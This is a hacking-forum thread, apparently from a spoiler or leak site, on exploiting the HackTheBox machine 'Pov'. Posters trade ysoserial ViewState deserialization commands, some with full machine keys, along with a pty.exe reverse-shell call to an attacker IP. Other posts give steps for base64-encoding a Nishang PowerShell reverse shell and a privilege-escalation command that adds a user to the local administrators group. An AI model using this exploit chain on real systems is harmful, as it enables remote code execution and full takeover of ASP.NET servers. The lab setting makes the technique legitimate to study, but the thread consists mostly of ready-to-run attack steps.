Pov - HTB
by paven - Saturday January 27, 2024 at 04:17 PM
#41
im stuck with wine and ysoserial... all i got with the commands from https://book.hacktricks.xyz/pentesting-w...-parameter
is the error message : "Invalid generator parameter. It needs to be in Hex format. Example: 955733D9"

never done that kind of stut before...help is much appreciated.
Reply
#42
(Jan 27, 2024, 10:31 PM)DwightSchrute Wrote: im stuck with wine and ysoserial... all i got with the commands from https://book.hacktricks.xyz/pentesting-w...-parameter
is the error message : "Invalid generator parameter. It needs to be in Hex format. Example: 955733D9"

never done that kind of stut before...help is much appreciated.

.\ysoserial.exe -p ViewState -g TextFormattingRunProperties --decryptionalg="AES" --decryptionkey="DECRYPTION_KEY" --validationalg="SHA1" --validationkey="VALIDATION_KEY" --path="/portfolio/contact.aspx"  -c "/programdata/pty.exe X.X.X.X 2228"

DECRYPTION_KEY et VALIDATION_KEY are in the web.config file
Reply
#43
./ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "COMMAND" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
Reply
#44
can someone post an example of the burp suite view state after inputting the ysoserial payload ? I can't seem to get a shell with the powershell command. Or which powershell rev shell did you use. Thanks.
Reply
#45
(Jan 27, 2024, 11:05 PM)DeepDrop Wrote: can someone post an example of the burp suite view state after inputting the ysoserial payload ? I can't seem to get a shell with the powershell command. Or which powershell rev shell did you use. Thanks.

powershell #3 base64 from revshells
Reply
#46
(Jan 27, 2024, 11:05 PM)DeepDrop Wrote: can someone post an example of the burp suite view state after inputting the ysoserial payload ? I can't seem to get a shell with the powershell command. Or which powershell rev shell did you use. Thanks.

rev.ps1 on github github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
code on linux `CODE=$(cat rev.ps1 | iconv -t utf-16le | base64 -w 0; echo)`
paste to -c `echo "powershell -enc $CODE"`
Reply
#47
(Jan 27, 2024, 11:11 PM)peRd1 Wrote:
(Jan 27, 2024, 11:05 PM)DeepDrop Wrote: can someone post an example of the burp suite view state after inputting the ysoserial payload ? I can't seem to get a shell with the powershell command. Or which powershell rev shell did you use. Thanks.

powershell #3 base64 from revshells

omg. thank you so much brother. i'm in.
Reply
#48
(Jan 27, 2024, 11:32 PM)Vapulame Wrote:
(Jan 27, 2024, 10:30 PM)jahman Wrote:
(Jan 27, 2024, 10:18 PM)Vapulame Wrote:
(Jan 27, 2024, 09:47 PM)ajasjas Wrote: Anyone got ysoserial working on dotNETCore? Some people don't touch Windows with a stick

it's not .net core, it's aspx, legacy asp.net ...

anyone any idea for root ?

https://github.com/daem0nc0re/PrivFu/tre...ivilegePoC

is the priv disabled by default, why i can't enable it thoo wth

i don't understand, alaading has the SeDebugPrivilege priv.

with the SeDebugPrivilegePoC ,you just have to modify the CreateProcess cmdline in the source code to feet with the box:
@"C:\Windows\System32\cmd.exe /c net localgroup administrators alaading /add"
Reply
#49
(Jan 27, 2024, 11:42 PM)jahman Wrote:
(Jan 27, 2024, 11:32 PM)Vapulame Wrote:
(Jan 27, 2024, 10:30 PM)jahman Wrote:
(Jan 27, 2024, 10:18 PM)Vapulame Wrote:
(Jan 27, 2024, 09:47 PM)ajasjas Wrote: Anyone got ysoserial working on dotNETCore? Some people don't touch Windows with a stick

it's not .net core, it's aspx, legacy asp.net ...

anyone any idea for root ?

https://github.com/daem0nc0re/PrivFu/tre...ivilegePoC

is the priv disabled by default, why i can't enable it thoo wth

i don't understand, alaading has the SeDebugPrivilege priv.

with the SeDebugPrivilegePoC ,you just have to modify the CreateProcess cmdline in the source code to feet with the box:
@"C:\Windows\System32\cmd.exe /c net localgroup administrators alaading /add"

yea yea nevermind i was doing some other dumb shit nvermind haha lol
Reply
#50
(Jan 27, 2024, 11:50 PM)mobilehack Wrote: decrypted them,

Yooo, how did you decrypt them... any leads to that? I don't want password
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 34 3,130 2 hours ago
Last Post: 0xff0day
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 93 8,531 3 hours ago
Last Post: shx
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 25 2,534 Yesterday, 02:43 PM
Last Post: cry_elite
  CBBH Write Ups hiddenhacker 25 6,595 Yesterday, 02:41 PM
Last Post: cry_elite
  [FREE] CPTS 12 FLAGS pulsebreaker 84 2,934 Yesterday, 02:33 PM
Last Post: justhelpmefly

Forum Jump:


 Users browsing this forum: 1 Guest(s)